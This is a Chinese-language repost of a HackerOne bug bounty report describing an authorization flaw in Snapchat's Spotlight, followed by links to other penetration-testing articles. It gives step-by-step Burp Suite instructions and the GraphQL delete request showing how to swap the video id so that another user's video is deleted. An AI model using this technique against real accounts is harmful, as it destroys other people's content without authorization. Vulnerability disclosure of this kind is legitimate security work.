Snapchat 有一个名为聚光灯的病毒视频功能，这是最大的趋势，增加了数百万的 snapchat 用户和利润。我找到了一种远程删除任何人的聚光灯的视频方法。

漏洞挖掘步骤

1. 首先转到https://my.snapchat.com/myposts并在那里登录。

2. 你会看到你的帖子。

3. 现在打开 burp suite 并拦截。

4. 选择您的任何帖子并单击删除选项。

5. 现在捕获删除请求。在删除请求中有参数id

6. 您只需更改此 id 参数。您可以轻松获取 id 参数。现在将 id 替换为其他人的视频 id 后转发请求。

{"operationName":"DeleteStorySnaps","variables":{"ids": ["███████"] ,"storyType":"SPOTLIGHT_STORY"},"query":"mutation DeleteStorySnaps($ids: [String!] !, $storyType: StoryType!) {\n deleteStorySnaps(ids: $ids, storyType: $storyType)\n}\n"}

其他用户的视频将被删除。

如何获取 ID 参数

每当您分享 Spotlight 时，您都可以在 url 中看到参数：

https: //story.snapchat.com/spotlight/█████

漏洞影响：

删除任何人的内容聚焦。想象一下删除视频最大的影响者和内容创作者。

获得赏金：

原文地址：https://hackerone.com/reports/1819832

推荐阅读

实战 | 记一次渗透拿下某儿童色情网站的经过

实战 | 某某街一处XSS的绕过思路

实战 | 记一次企业钓鱼演练

干货 | 2022年超全的安全知识库

实战 | 实战一次完整的BC网站渗透测试

星球部分精华内容推荐

其他更多精彩内容，欢迎加入我们的星球